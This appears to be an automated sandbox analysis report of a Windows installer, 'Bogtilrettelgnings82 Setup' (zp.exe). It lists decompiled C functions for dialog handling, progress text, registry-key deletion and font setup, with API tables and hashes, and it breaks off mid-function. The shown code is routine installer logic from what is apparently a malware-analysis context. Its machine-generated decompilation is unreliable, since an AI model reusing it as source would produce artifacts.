                                                            • Instruction ID: 2b7602dd897122490efce7636127cf141f752ce9b4a01bbcaa67e469b6673d4c
                                                            • Opcode Fuzzy Hash: 74fb76eeeede5a40a20a2361ef673ad81c0513ff9195b193d02cf5d9451a49b8
                                                            • Instruction Fuzzy Hash: 1C01C4B094A214ABE721AF60AF0DEAE776CBB01701B144137F501B12E1C2B8E941C69E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00404894(struct HWND__* _a4, intOrPtr _a8) {
                                                            				long _v8;
                                                            				signed char _v12;
                                                            				unsigned int _v16;
                                                            				void* _v20;
                                                            				intOrPtr _v24;
                                                            				long _v56;
                                                            				void* _v60;
                                                            				long _t15;
                                                            				unsigned int _t19;
                                                            				signed int _t25;
                                                            				struct HWND__* _t28;
                                                            
                                                            				_t28 = _a4;
                                                            				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                                                            				if(_a8 == 0) {
                                                            					L4:
                                                            					_v56 = _t15;
                                                            					_v60 = 4;
                                                            					SendMessageA(_t28, 0x110c, 0,  &_v60);
                                                            					return _v24;
                                                            				}
                                                            				_t19 = GetMessagePos();
                                                            				_v16 = _t19 >> 0x10;
                                                            				_v20 = _t19;
                                                            				ScreenToClient(_t28,  &_v20);
                                                            				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                                                            				if((_v12 & 0x00000066) != 0) {
                                                            					_t15 = _v8;
                                                            					goto L4;
                                                            				}
                                                            				return _t25 | 0xffffffff;
                                                            			}














                                                            0x004048a2
                                                            0x004048af
                                                            0x004048b5
                                                            0x004048f3
                                                            0x004048f3
                                                            0x00404902
                                                            0x00404909
                                                            0x00000000
                                                            0x0040490b
                                                            0x004048b7
                                                            0x004048c6
                                                            0x004048ce
                                                            0x004048d1
                                                            0x004048e3
                                                            0x004048e9
                                                            0x004048f0
                                                            0x00000000
                                                            0x004048f0
                                                            0x00000000

                                                            APIs
                                                            • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004048AF
                                                            • GetMessagePos.USER32 ref: 004048B7
                                                            • ScreenToClient.USER32(?,?), ref: 004048D1
                                                            • SendMessageA.USER32(?,00001111,00000000,?), ref: 004048E3
                                                            • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404909
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: Message$Send$ClientScreen
                                                            • String ID: f
                                                            • API String ID: 41195575-1993550816
                                                            • Opcode ID: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                                            • Instruction ID: 496b0d989960c3cf29f9699654413807f08c541ba74c601a1343b1cc24abed90
                                                            • Opcode Fuzzy Hash: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                                            • Instruction Fuzzy Hash: A9015275D00219BAEB11DBA4DC45FFFBBBCAF55711F10412BBA10B61C0C7B4A5418BA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00402B42(struct HWND__* _a4, intOrPtr _a8) {
                                                            				char _v68;
                                                            				void* _t11;
                                                            				CHAR* _t19;
                                                            
                                                            				if(_a8 == 0x110) {
                                                            					SetTimer(_a4, 1, 0xfa, 0);
                                                            					_a8 = 0x113;
                                                            				}
                                                            				if(_a8 == 0x113) {
                                                            					_t11 = E00402BBE();
                                                            					_t19 = "unpacking data: %d%%";
                                                            					if( *0x4236f0 == 0) {
                                                            						_t19 = "verifying installer: %d%%";
                                                            					}
                                                            					wsprintfA( &_v68, _t19, _t11);
                                                            					SetWindowTextA(_a4,  &_v68);
                                                            					SetDlgItemTextA(_a4, 0x406,  &_v68);
                                                            				}
                                                            				return 0;
                                                            			}






                                                            0x00402b4f
                                                            0x00402b5d
                                                            0x00402b63
                                                            0x00402b63
                                                            0x00402b71
                                                            0x00402b73
                                                            0x00402b7f
                                                            0x00402b84
                                                            0x00402b86
                                                            0x00402b86
                                                            0x00402b91
                                                            0x00402ba1
                                                            0x00402bb3
                                                            0x00402bb3
                                                            0x00402bbb

                                                            APIs
                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B5D
                                                            • wsprintfA.USER32 ref: 00402B91
                                                            • SetWindowTextA.USER32(?,?), ref: 00402BA1
                                                            • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BB3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                            • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                            • API String ID: 1451636040-1158693248
                                                            • Opcode ID: eb69263b85c0967037015140e31ace042ee7bd246636b1be7c2271423c491acf
                                                            • Instruction ID: 1e30126d7328232efec95edeb0659339e9715d7a4c2dcddc2072aaf334070cd4
                                                            • Opcode Fuzzy Hash: eb69263b85c0967037015140e31ace042ee7bd246636b1be7c2271423c491acf
                                                            • Instruction Fuzzy Hash: EBF01270900108BBDF215F61CD0ABEE3779EB10345F00803AFA06B51D0D7F8AA558B99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 51%
                                                            			E004047B2(int _a4, intOrPtr _a8, unsigned int _a12) {
                                                            				char _v36;
                                                            				char _v68;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				void* _t26;
                                                            				void* _t34;
                                                            				signed int _t36;
                                                            				signed int _t39;
                                                            				unsigned int _t46;
                                                            
                                                            				_t46 = _a12;
                                                            				_push(0x14);
                                                            				_pop(0);
                                                            				_t34 = 0xffffffdc;
                                                            				if(_t46 < 0x100000) {
                                                            					_push(0xa);
                                                            					_pop(0);
                                                            					_t34 = 0xffffffdd;
                                                            				}
                                                            				if(_t46 < 0x400) {
                                                            					_t34 = 0xffffffde;
                                                            				}
                                                            				if(_t46 < 0xffff3333) {
                                                            					_t39 = 0x14;
                                                            					asm("cdq");
                                                            					_t46 = _t46 + 1 / _t39;
                                                            				}
                                                            				_push(E00405D00(_t34, 0, _t46,  &_v36, 0xffffffdf));
                                                            				_push(E00405D00(_t34, 0, _t46,  &_v68, _t34));
                                                            				_t21 = _t46 & 0x00ffffff;
                                                            				_t36 = 0xa;
                                                            				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
                                                            				_push(_t46 >> 0);
                                                            				_t26 = E00405D00(_t34, 0, 0x41fce0, 0x41fce0, _a8);
                                                            				wsprintfA(_t26 + lstrlenA(0x41fce0), "%u.%u%s%s");
                                                            				return SetDlgItemTextA( *0x422eb8, _a4, 0x41fce0);
                                                            			}













                                                            0x004047ba
                                                            0x004047be
                                                            0x004047c6
                                                            0x004047c9
                                                            0x004047ca
                                                            0x004047cc
                                                            0x004047ce
                                                            0x004047d1
                                                            0x004047d1
                                                            0x004047d8
                                                            0x004047de
                                                            0x004047de
                                                            0x004047e5
                                                            0x004047f0
                                                            0x004047f1
                                                            0x004047f4
                                                            0x004047f4
                                                            0x00404801
                                                            0x0040480c
                                                            0x0040480f
                                                            0x00404821
                                                            0x00404828
                                                            0x00404829
                                                            0x00404838
                                                            0x00404848
                                                            0x00404864

                                                            APIs
                                                            • lstrlenA.KERNEL32(Bogtilrettelgnings82 Setup: Installing,Bogtilrettelgnings82 Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004046D2,000000DF,0000040F,00000400,00000000), ref: 00404840
                                                            • wsprintfA.USER32 ref: 00404848
                                                            • SetDlgItemTextA.USER32(?,Bogtilrettelgnings82 Setup: Installing), ref: 0040485B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: ItemTextlstrlenwsprintf
                                                            • String ID: %u.%u%s%s$Bogtilrettelgnings82 Setup: Installing
                                                            • API String ID: 3540041739-1008884453
                                                            • Opcode ID: f043f7f958de03c1dfbf7371bdda6b63f5028b7502eadd070cc116c886b6bfad
                                                            • Instruction ID: ac025ec359353314cc5270af0c4b085ff7d14dcca326c3d749765100b4f994c7
                                                            • Opcode Fuzzy Hash: f043f7f958de03c1dfbf7371bdda6b63f5028b7502eadd070cc116c886b6bfad
                                                            • Instruction Fuzzy Hash: 2F11E27360012437DB00626D9C4AFEF3659DBC2334F24423BFA29B71D1E9789C6282E9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00403A2C(void* __ecx, void* __eflags) {
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				signed short _t6;
                                                            				intOrPtr _t11;
                                                            				signed int _t13;
                                                            				signed int _t16;
                                                            				signed short* _t18;
                                                            				signed int _t20;
                                                            				signed short* _t23;
                                                            				intOrPtr _t25;
                                                            				signed int _t26;
                                                            				intOrPtr* _t27;
                                                            
                                                            				_t24 = "1033";
                                                            				_t13 = 0xffff;
                                                            				_t6 = E00405C55(__ecx, "1033");
                                                            				while(1) {
                                                            					_t26 =  *0x423724;
                                                            					if(_t26 == 0) {
                                                            						goto L7;
                                                            					}
                                                            					_t16 =  *( *0x4236f0 + 0x64);
                                                            					_t20 =  ~_t16;
                                                            					_t18 = _t16 * _t26 +  *0x423720;
                                                            					while(1) {
                                                            						_t18 = _t18 + _t20;
                                                            						_t26 = _t26 - 1;
                                                            						if((( *_t18 ^ _t6) & _t13) == 0) {
                                                            							break;
                                                            						}
                                                            						if(_t26 != 0) {
                                                            							continue;
                                                            						}
                                                            						goto L7;
                                                            					}
                                                            					 *0x422ec0 = _t18[1];
                                                            					 *0x423788 = _t18[3];
                                                            					_t23 =  &(_t18[5]);
                                                            					if(_t23 != 0) {
                                                            						 *0x422ebc = _t23;
                                                            						E00405C3C(_t24,  *_t18 & 0x0000ffff);
                                                            						SetWindowTextA( *0x41fcc0, E00405D00(_t13, _t24, _t26, "Bogtilrettelgnings82 Setup", 0xfffffffe));
                                                            						_t11 =  *0x42370c;
                                                            						_t27 =  *0x423708;
                                                            						if(_t11 == 0) {
                                                            							L15:
                                                            							return _t11;
                                                            						}
                                                            						_t25 = _t11;
                                                            						do {
                                                            							_t11 =  *_t27;
                                                            							if(_t11 != 0) {
                                                            								_t11 = E00405D00(_t13, _t25, _t27, _t27 + 0x18, _t11);
                                                            							}
                                                            							_t27 = _t27 + 0x418;
                                                            							_t25 = _t25 - 1;
                                                            						} while (_t25 != 0);
                                                            						goto L15;
                                                            					}
                                                            					L7:
                                                            					if(_t13 != 0xffff) {
                                                            						_t13 = 0;
                                                            					} else {
                                                            						_t13 = 0x3ff;
                                                            					}
                                                            				}
                                                            			}
















                                                            0x00403a30
                                                            0x00403a35
                                                            0x00403a3b
                                                            0x00403a40
                                                            0x00403a40
                                                            0x00403a48
                                                            0x00000000
                                                            0x00000000
                                                            0x00403a50
                                                            0x00403a58
                                                            0x00403a5a
                                                            0x00403a60
                                                            0x00403a60
                                                            0x00403a62
                                                            0x00403a6e
                                                            0x00000000
                                                            0x00000000
                                                            0x00403a72
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00403a74
                                                            0x00403a79
                                                            0x00403a82
                                                            0x00403a88
                                                            0x00403a8d
                                                            0x00403aa1
                                                            0x00403aac
                                                            0x00403ac4
                                                            0x00403aca
                                                            0x00403acf
                                                            0x00403ad7
                                                            0x00403af8
                                                            0x00403af8
                                                            0x00403af8
                                                            0x00403ad9
                                                            0x00403adb
                                                            0x00403adb
                                                            0x00403adf
                                                            0x00403ae6
                                                            0x00403ae6
                                                            0x00403aeb
                                                            0x00403af1
                                                            0x00403af1
                                                            0x00000000
                                                            0x00403adb
                                                            0x00403a8f
                                                            0x00403a94
                                                            0x00403a9d
                                                            0x00403a96
                                                            0x00403a96
                                                            0x00403a96
                                                            0x00403a94

                                                            APIs
                                                            • SetWindowTextA.USER32(00000000,Bogtilrettelgnings82 Setup), ref: 00403AC4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: TextWindow
                                                            • String ID: "C:\Users\user\Desktop\zp.exe"$1033$Bogtilrettelgnings82 Setup$Bogtilrettelgnings82 Setup: Installing
                                                            • API String ID: 530164218-3578629607
                                                            • Opcode ID: 7da43f0c514d78443db1c9c9eeb4ba8c9d941e0bb92036ebee77233e000656fa
                                                            • Instruction ID: f1b991f97094af788ebc2fc7f50f41b17603f103b5ffb0c1ba3ee096011c9b45
                                                            • Opcode Fuzzy Hash: 7da43f0c514d78443db1c9c9eeb4ba8c9d941e0bb92036ebee77233e000656fa
                                                            • Instruction Fuzzy Hash: DE11D1B1B04611ABCB20DF55DC80A377BADEB84716369813FE941A7391C63D9D029EA8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 84%
                                                            			E00402A3D(void* _a4, char* _a8, intOrPtr _a12) {
                                                            				void* _v8;
                                                            				char _v272;
                                                            				long _t18;
                                                            				intOrPtr* _t27;
                                                            				long _t28;
                                                            
                                                            				_t18 = RegOpenKeyExA(_a4, _a8, 0,  *0x423790 | 0x00000008,  &_v8);
                                                            				if(_t18 == 0) {
                                                            					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
                                                            						if(_a12 != 0) {
                                                            							RegCloseKey(_v8);
                                                            							L8:
                                                            							return 1;
                                                            						}
                                                            						if(E00402A3D(_v8,  &_v272, 0) != 0) {
                                                            							break;
                                                            						}
                                                            					}
                                                            					RegCloseKey(_v8);
                                                            					_t27 = E00406009(2);
                                                            					if(_t27 == 0) {
                                                            						if( *0x423790 != 0) {
                                                            							goto L8;
                                                            						}
                                                            						_t28 = RegDeleteKeyA(_a4, _a8);
                                                            						if(_t28 != 0) {
                                                            							goto L8;
                                                            						}
                                                            						return _t28;
                                                            					}
                                                            					return  *_t27(_a4, _a8,  *0x423790, 0);
                                                            				}
                                                            				return _t18;
                                                            			}








                                                            0x00402a5e
                                                            0x00402a66
                                                            0x00402a8e
                                                            0x00402a78
                                                            0x00402ac8
                                                            0x00402ace
                                                            0x00000000
                                                            0x00402ad0
                                                            0x00402a8c
                                                            0x00000000
                                                            0x00000000
                                                            0x00402a8c
                                                            0x00402aa3
                                                            0x00402aab
                                                            0x00402ab2
                                                            0x00402ade
                                                            0x00000000
                                                            0x00000000
                                                            0x00402ae6
                                                            0x00402aee
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00402aee
                                                            0x00000000
                                                            0x00402ac1
                                                            0x00402ad5

                                                            APIs
                                                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A5E
                                                            • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A9A
                                                            • RegCloseKey.ADVAPI32(?), ref: 00402AA3
                                                            • RegCloseKey.ADVAPI32(?), ref: 00402AC8
                                                            • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AE6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: Close$DeleteEnumOpen
                                                            • String ID:
                                                            • API String ID: 1912718029-0
                                                            • Opcode ID: 4b25ae56376b3f1221da29a59a5e0d01808cbf612e92f5f00375b302b45f37be
                                                            • Instruction ID: 6a9a95a3d1c289ebb6cdea9d4b31099183be5c714bdf59020cec6d7c6c818ba9
                                                            • Opcode Fuzzy Hash: 4b25ae56376b3f1221da29a59a5e0d01808cbf612e92f5f00375b302b45f37be
                                                            • Instruction Fuzzy Hash: 27114C71A00108FFDF21AF90DE49DAA3B7DEB54349F104136FA06B10A0DBB49E51AF69
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00401CCC(int __edx) {
                                                            				void* _t17;
                                                            				struct HINSTANCE__* _t21;
                                                            				struct HWND__* _t25;
                                                            				void* _t27;
                                                            
                                                            				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
                                                            				GetClientRect(_t25, _t27 - 0x40);
                                                            				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029FD(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
                                                            				if(_t17 != _t21) {
                                                            					DeleteObject(_t17);
                                                            				}
                                                            				 *0x423768 =  *0x423768 +  *((intOrPtr*)(_t27 - 4));
                                                            				return 0;
                                                            			}







                                                            0x00401cd6
                                                            0x00401cdd
                                                            0x00401d0c
                                                            0x00401d14
                                                            0x00401d1b
                                                            0x00401d1b
                                                            0x00402895
                                                            0x004028a1

                                                            APIs
                                                            • GetDlgItem.USER32(?), ref: 00401CD0
                                                            • GetClientRect.USER32(00000000,?), ref: 00401CDD
                                                            • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401CFE
                                                            • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D0C
                                                            • DeleteObject.GDI32(00000000), ref: 00401D1B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                            • String ID:
                                                            • API String ID: 1849352358-0
                                                            • Opcode ID: afc77c7f451b2242da1554e4e7d8ecbe8a3e94b7ffbccff52fd4b80020e54d7f
                                                            • Instruction ID: f51ac8410cbf6ce335f498807c5bd2b5625ae864585cec2d5bc31dfd5d98a64c
                                                            • Opcode Fuzzy Hash: afc77c7f451b2242da1554e4e7d8ecbe8a3e94b7ffbccff52fd4b80020e54d7f
                                                            • Instruction Fuzzy Hash: 6DF012B2A05115BFE701EBA4EE89DAF77BCEB44301B109576F501F2191C7789D018B79
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 71%
                                                            			E00401D26() {
                                                            				void* __esi;
                                                            				int _t7;
                                                            				signed char _t13;
                                                            				struct HFONT__* _t16;
                                                            				void* _t20;
                                                            				struct HDC__* _t26;
                                                            				void* _t28;
                                                            				void* _t30;
                                                            
                                                            				_t26 = GetDC( *(_t30 - 0x34));
                                                            				_t7 = GetDeviceCaps(_t26, 0x5a);
                                                            				0x40a7b8->lfHeight =  ~(MulDiv(E004029E0(2), _t7, 0x48));
                                                            				ReleaseDC( *(_t30 - 0x34), _t26);
                                                            				 *0x40a7c8 = E004029E0(3);
                                                            				_t13 =  *((intOrPtr*)(_t30 - 0x14));
                                                            				 *0x40a7cf = 1;
                                                            				 *0x40a7cc = _t13 & 0x00000001;
                                                            				 *0x40a7cd = _t13 & 0x00000002;
                                                            				 *0x40a7ce = _t13 & 0x00000004;
                                                            				E00405D00(_t20, _t26, _t28, 0x40a7d4,  *((intOrPtr*)(_t30 - 0x20)));
                                                            				_t16 = CreateFontIndirectA(0x40a7b8);
                                                            				_push(_t16);
                                                            				_push(_t28);
                                                            				E00405C3C();
                                                            				 *0x423768 =  *0x423768 +  *((intOrPtr*)(_t30 - 4));
                                                            				return 0;
                                                            			}











                                                            0x00401d2f
                                                            0x00401d36
                                                            0x00401d51
                                                            0x00401d56
                                                            0x00401d63
                                                            0x00401d68
                                                            0x00401d73
                                                            0x00401d7a
                                                            0x00401d8c
                                                            0x00401d92
                                                            0x00401d97
                                                            0x00401da1
                                                            0x004024cb
                                                            0x00401561
                                                            0x0040283a
                                                            0x00402895
                                                            0x004028a1

                                                            APIs
                                                            • GetDC.USER32(?), ref: 00401D29
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D36
                                                            • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D45
                                                            • ReleaseDC.USER32(?,00000000), ref: 00401D56
                                                            • CreateFontIndirectA.GDI32(0040A7B8), ref: 00401DA1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                            • String ID:
                                                            • API String ID: 3808545654-0
                                                            • Opcode ID: 6db521c7c502fe74efbec2512e91b531a8c8ce959b0fac9aafa0bb78a36e2a65
                                                            • Instruction ID: 060246e538297e9e1c784849604c8f7f1088759f99002d8560b965ebc89bd25b
                                                            • Opcode Fuzzy Hash: 6db521c7c502fe74efbec2512e91b531a8c8ce959b0fac9aafa0bb78a36e2a65
                                                            • Instruction Fuzzy Hash: 43018671958340AFEB015BB0AE0EB9E3FB4EB15705F208439F141B72E2C57854159B2F
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 51%
                                                            			E00401BB8() {
                                                            				signed int _t28;
                                                            				CHAR* _t31;
                                                            				long _t32;
                                                            				int _t37;
                                                            				signed int _t38;
                                                            				int _t42;
                                                            				int _t48;
                                                            				struct HWND__* _t52;
                                                            				void* _t55;
                                                            
                                                            				 *(_t55 - 0x34) = E004029E0(3);
                                                            				 *(_t55 + 8) = E004029E0(4);
                                                            				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
                                                            					 *((intOrPtr*)(__ebp - 0x34)) = E004029FD(0x33);
                                                            				}
                                                            				__eflags =  *(_t55 - 0x10) & 0x00000002;
                                                            				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
                                                            					 *(_t55 + 8) = E004029FD(0x44);
                                                            				}
                                                            				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
                                                            				_push(1);
                                                            				if(__eflags != 0) {
                                                            					_t50 = E004029FD();
                                                            					_t28 = E004029FD();
                                                            					asm("sbb ecx, ecx");
                                                            					asm("sbb eax, eax");
                                                            					_t31 =  ~( *_t27) & _t50;
                                                            					__eflags = _t31;
                                                            					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
                                                            					goto L10;
                                                            				} else {
                                                            					_t52 = E004029E0();
                                                            					_t37 = E004029E0();
                                                            					_t48 =  *(_t55 - 0x10) >> 2;
                                                            					if(__eflags == 0) {
                                                            						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
                                                            						L10:
                                                            						 *(_t55 - 8) = _t32;
                                                            					} else {
                                                            						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
